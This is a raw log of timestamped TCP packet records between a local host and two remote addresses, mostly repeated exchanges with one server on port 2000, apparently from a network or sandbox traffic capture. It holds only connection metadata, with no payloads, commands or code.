Dec 4, 2022 22:25:12.621530056 CET	443	49726	104.20.68.143	192.168.2.3
Dec 4, 2022 22:25:12.621622086 CET	49726	443	192.168.2.3	104.20.68.143
Dec 4, 2022 22:25:12.709559917 CET	49725	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:13.313782930 CET	49729	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:13.417211056 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:13.417303085 CET	49729	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:14.786284924 CET	49727	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:14.911945105 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:14.913115025 CET	49727	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:15.051009893 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:15.059276104 CET	49728	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:15.109184027 CET	49727	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:15.168294907 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:15.168869972 CET	49728	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:15.311131954 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:15.319741964 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:15.416126013 CET	49728	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:16.427134991 CET	49729	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:16.536889076 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:16.537547112 CET	49729	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:16.686254978 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:16.697649956 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:16.738223076 CET	49729	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:16.954567909 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:16.955197096 CET	49708	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:16.969626904 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:16.970276117 CET	49709	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:16.978823900 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:16.989078999 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:16.999161005 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:17.008012056 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:17.016680956 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:17.019299030 CET	49711	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:17.021188974 CET	49711	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:17.021792889 CET	49723	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:17.022262096 CET	49725	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:17.022947073 CET	49728	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:17.025480032 CET	49727	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:17.028911114 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:17.031222105 CET	49729	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:17.099255085 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:17.111808062 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:17.163934946 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:17.164355993 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:17.164680958 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:17.165199995 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:17.170996904 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:17.172832966 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:20.191977978 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:20.197496891 CET	49730	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:20.302373886 CET	2000	49730	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:20.302604914 CET	49730	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:20.316606045 CET	49708	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:22.039119959 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:22.039788008 CET	49708	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:22.057661057 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:22.058393002 CET	49709	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:22.068479061 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:22.073205948 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:22.077124119 CET	49711	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:22.077692986 CET	49723	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:22.082339048 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:22.085503101 CET	49725	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:22.093740940 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:22.094463110 CET	49727	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:22.103987932 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:22.105170012 CET	49728	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:22.113138914 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:22.118145943 CET	49729	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:22.185519934 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:22.201216936 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:22.220503092 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:22.227668047 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:22.230333090 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:22.238159895 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:22.250551939 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:22.265702963 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:22.269745111 CET	49730	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:22.282509089 CET	49731	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:22.376935959 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:22.385293961 CET	49708	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:22.386604071 CET	2000	49731	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:22.386809111 CET	49731	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:22.414424896 CET	2000	49730	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:22.498980999 CET	2000	49730	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:22.528615952 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:22.616730928 CET	49730	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:27.123090982 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:27.142247915 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:27.143023014 CET	49709	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:27.153489113 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:27.154290915 CET	49711	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:27.165323973 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:27.166198015 CET	49723	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:27.181421995 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:27.182101011 CET	49725	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:27.191584110 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:27.199414968 CET	49727	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:27.204057932 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:27.207354069 CET	49728	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:27.212390900 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:27.212925911 CET	49729	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:27.217067957 CET	49708	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:27.284853935 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:27.300636053 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:27.308582067 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:27.325660944 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:27.342544079 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:27.351109028 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:27.355639935 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:27.677115917 CET	49730	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:27.677582026 CET	49708	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:27.677737951 CET	49731	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:27.789968014 CET	2000	49730	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:27.791203022 CET	49730	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:27.819813013 CET	2000	49731	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:27.819853067 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:27.894087076 CET	2000	49730	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:27.894227982 CET	2000	49730	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:27.894303083 CET	49730	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:27.894304037 CET	49730	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:27.894398928 CET	49730	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:27.894467115 CET	2000	49730	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:27.894539118 CET	49730	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:27.996912956 CET	2000	49730	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:27.996970892 CET	2000	49730	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:27.997003078 CET	2000	49730	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:27.997039080 CET	2000	49730	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:27.997097015 CET	49730	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:27.997168064 CET	49730	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:27.997196913 CET	49730	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:27.997307062 CET	2000	49730	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:27.997428894 CET	49730	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:27.997543097 CET	2000	49730	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:27.997711897 CET	49730	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:28.100797892 CET	2000	49730	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:28.100850105 CET	2000	49730	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:28.100970984 CET	49730	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:28.101308107 CET	2000	49730	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:28.101509094 CET	2000	49730	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:28.101600885 CET	49730	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:28.102096081 CET	2000	49730	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:28.102130890 CET	2000	49730	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:28.142589092 CET	2000	49730	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:28.203877926 CET	2000	49730	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:28.203919888 CET	2000	49730	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:28.204096079 CET	2000	49730	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:28.204322100 CET	2000	49730	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:28.204623938 CET	2000	49730	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:28.204648018 CET	2000	49730	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:28.204777956 CET	2000	49730	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:28.204967976 CET	2000	49730	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:28.205070972 CET	2000	49730	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:28.205351114 CET	2000	49730	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:28.205683947 CET	2000	49730	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:28.205935001 CET	2000	49730	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:28.245577097 CET	2000	49730	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:29.657478094 CET	49731	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:29.800638914 CET	2000	49731	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:32.223393917 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:32.229146957 CET	49708	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:32.239454985 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:32.240255117 CET	49709	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:32.256122112 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:32.256902933 CET	49711	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:32.267426014 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:32.268253088 CET	49723	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:32.289846897 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:32.290702105 CET	49725	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:32.302437067 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:32.303288937 CET	49727	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:32.316740036 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:32.325808048 CET	49728	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:32.341075897 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:32.341785908 CET	49729	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:32.372730970 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:32.382421017 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:32.398511887 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:32.410490990 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:32.433595896 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:32.445554018 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:32.467521906 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:32.485773087 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:37.363322973 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:37.377743006 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:37.391076088 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:37.403662920 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:37.403842926 CET	49708	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:37.413916111 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:37.417829037 CET	49709	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:37.422723055 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:37.431055069 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:37.431796074 CET	49711	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:37.439685106 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:37.443793058 CET	49723	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:37.453851938 CET	49725	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:37.462838888 CET	49727	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:37.471885920 CET	49728	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:37.480843067 CET	49729	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:38.412944078 CET	49728	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:38.413517952 CET	49723	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:38.414058924 CET	49725	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:38.414539099 CET	49709	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:38.415054083 CET	49729	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:38.415565968 CET	49727	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:38.416121006 CET	49711	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:38.417263031 CET	49708	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:38.557297945 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:38.557354927 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:38.557387114 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:38.557420015 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:38.559212923 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:38.559261084 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:38.559295893 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:38.560467005 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:42.449033022 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:42.454952002 CET	49708	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:42.460655928 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:42.469897032 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:42.474838972 CET	49711	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:42.474891901 CET	49709	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:42.477978945 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:42.479275942 CET	49723	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:42.487710953 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:42.488810062 CET	49725	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:42.495908976 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:42.497232914 CET	49727	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:42.503326893 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:42.508598089 CET	49728	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:42.511126995 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:42.512443066 CET	49729	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:42.598601103 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:42.618499994 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:42.618598938 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:42.621496916 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:42.631876945 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:42.639334917 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:42.650768042 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:42.655632019 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:47.525525093 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:47.531007051 CET	49708	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:47.541533947 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:47.547086000 CET	49709	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:47.560956955 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:47.574573994 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:47.575084925 CET	49723	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:47.583154917 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:47.583684921 CET	49725	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:47.592699051 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:47.593195915 CET	49727	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:47.600857973 CET	49711	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:47.603322029 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:47.603827000 CET	49728	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:47.616087914 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:47.616626978 CET	49729	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:47.677531004 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:47.691286087 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:47.719340086 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:47.726901054 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:47.735455990 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:47.747920036 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:47.760678053 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:48.079356909 CET	49711	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:48.228348970 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:52.628806114 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:52.638959885 CET	49708	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:52.640122890 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:52.641330957 CET	49709	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:52.648663044 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:52.649971962 CET	49711	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:52.655317068 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:52.656600952 CET	49723	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:52.662401915 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:52.667603016 CET	49725	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:52.669698000 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:52.671627045 CET	49727	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:52.677138090 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:52.680732012 CET	49728	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:52.684097052 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:52.690481901 CET	49729	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:52.781277895 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:52.783986092 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:52.792115927 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:52.799098015 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:52.810411930 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:52.814908981 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:52.824130058 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:52.833960056 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:57.693836927 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:57.707029104 CET	49708	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:57.715743065 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:57.716253996 CET	49709	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:57.734215021 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:57.735022068 CET	49711	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:57.748670101 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:57.749299049 CET	49723	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:57.761857986 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:57.762501001 CET	49725	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:57.776676893 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:57.777328968 CET	49727	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:57.790997982 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:57.791490078 CET	49728	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:57.805672884 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:57.806220055 CET	49729	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:57.857348919 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:57.858998060 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:57.878319979 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:57.893254995 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:57.906146049 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:57.921227932 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:57.935318947 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:57.949996948 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:02.818569899 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:02.824146986 CET	49708	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:02.835071087 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:02.836275101 CET	49709	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:02.858447075 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:02.862420082 CET	49711	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:02.869478941 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:02.874403000 CET	49723	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:02.877819061 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:02.881973982 CET	49725	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:02.888412952 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:02.889739037 CET	49727	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:02.894530058 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:02.898303986 CET	49728	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:02.904089928 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:02.904561996 CET	49729	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:02.968065023 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:02.993810892 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:03.005022049 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:03.017959118 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:03.024012089 CET	2000	49725	86.48.24.91	192.168.2.3
